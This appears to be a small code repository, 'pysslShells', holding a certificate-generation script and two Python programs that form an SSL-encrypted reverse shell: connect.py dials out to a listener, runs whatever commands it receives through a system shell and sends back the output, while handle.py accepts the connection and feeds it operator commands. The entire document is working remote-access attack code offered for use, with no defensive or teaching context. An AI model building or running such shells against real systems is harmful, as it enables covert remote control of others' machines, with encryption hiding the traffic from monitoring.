├── README.md ├── gencrts.sh └── reverse ├── connect.py └── handle.py /README.md: -------------------------------------------------------------------------------- 1 | # pysslShells 2 | Finally, reverse/bind shells written in python, encrypted with ssl! 3 | -------------------------------------------------------------------------------- /gencrts.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | # Generate keys for ssl socket 3 | 4 | openssl genrsa -des3 -out server.orig.key 2048 5 | openssl rsa -in server.orig.key -out server.key 6 | openssl req -new -key server.key -out server.csr 7 | openssl x509 -req -days 365 -in server.csr -signkey server.key -out server.crt 8 | 9 | exit 10 | -------------------------------------------------------------------------------- /reverse/connect.py: -------------------------------------------------------------------------------- 1 | import os 2 | import socket 3 | import subprocess 4 | import ssl 5 | 6 | # Create a socket 7 | def socket_create(): 8 | try: 9 | global host 10 | global port 11 | global ssls 12 | host = '127.0.0.1' 13 | port = 9999 14 | s = socket.socket() 15 | ssls = wrappedSocket = ssl.wrap_socket(s, ssl_version=ssl.PROTOCOL_TLSv1) 16 | except socket.error as msg: 17 | print("Socket creation error: " + str(msg)) 18 | 19 | 20 | # Connect to a remote socket 21 | def socket_connect(): 22 | try: 23 | global host 24 | global port 25 | global s 26 | ssls.connect((host, port)) 27 | except socket.error as msg: 28 | print("Socket connection error: " + str(msg)) 29 | 30 | 31 | # Receive commands from remote server and run on local machine 32 | def receive_commands(): 33 | global s 34 | while True: 35 | data = ssls.recv(1024) 36 | if data[:2].decode("utf-8") == 'cd': 37 | os.chdir(data[3:].decode("utf-8")) 38 | if len(data) > 0: 39 | cmd = subprocess.Popen(data[:].decode("utf-8"), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE) 40 | output_bytes = cmd.stdout.read() + cmd.stderr.read() 41 | output_str = str(output_bytes) 42 | ssls.send(str.encode(output_str + str(os.getcwd()) + '> ')) 43 | print(output_str) 44 | s.close() 45 | 46 | 47 | def main(): 48 | socket_create() 49 | socket_connect() 50 | receive_commands() 51 | 52 | 53 | main() 54 | -------------------------------------------------------------------------------- /reverse/handle.py: -------------------------------------------------------------------------------- 1 | from __future__ import print_function 2 | import socket 3 | import sys 4 | import ssl 5 | cmd = "" 6 | 7 | def socket_create(): 8 | try: 9 | global host 10 | global port 11 | global s 12 | host = '' 13 | port = 9999 14 | s = socket.socket() 15 | s = ssl.wrap_socket(s, certfile='ssl.crt', keyfile='ssl.key', ssl_version=ssl.PROTOCOL_TLSv1) 16 | except socket.error as msg: 17 | print("Socket creation error: " + str(msg)) 18 | 19 | 20 | # Bind socket to port (the host and port the communication will take place) and wait for connection from client 21 | def socket_bind(): 22 | try: 23 | global host 24 | global port 25 | global s 26 | print("Binding socket to port: " + str(port)) 27 | s.bind((host, port)) 28 | s.listen(5) 29 | except socket.error as msg: 30 | print("Socket binding error: " + str(msg) + "\n" + "Retrying...") 31 | socket_bind() 32 | 33 | 34 | # Establish connection with client (socket must be listening for them) 35 | def socket_accept(): 36 | conn, address = s.accept() 37 | print("Connection has been established | " + "IP " + address[0] + " | Port " + str(address[1])) 38 | send_commands(conn) 39 | conn.close() 40 | 41 | 42 | # Send commands 43 | def send_commands(conn): 44 | while True: 45 | cmd = raw_input() 46 | if cmd == 'quit': 47 | conn.close() 48 | s.close() 49 | sys.exit() 50 | if len(str.encode(cmd)) > 0: 51 | conn.send(str.encode(cmd)) 52 | client_response = str(conn.recv(1024)) 53 | print(client_response, end="") 54 | 55 | 56 | def main(): 57 | socket_create() 58 | socket_bind() 59 | socket_accept() 60 | 61 | 62 | main() 63 | --------------------------------------------------------------------------------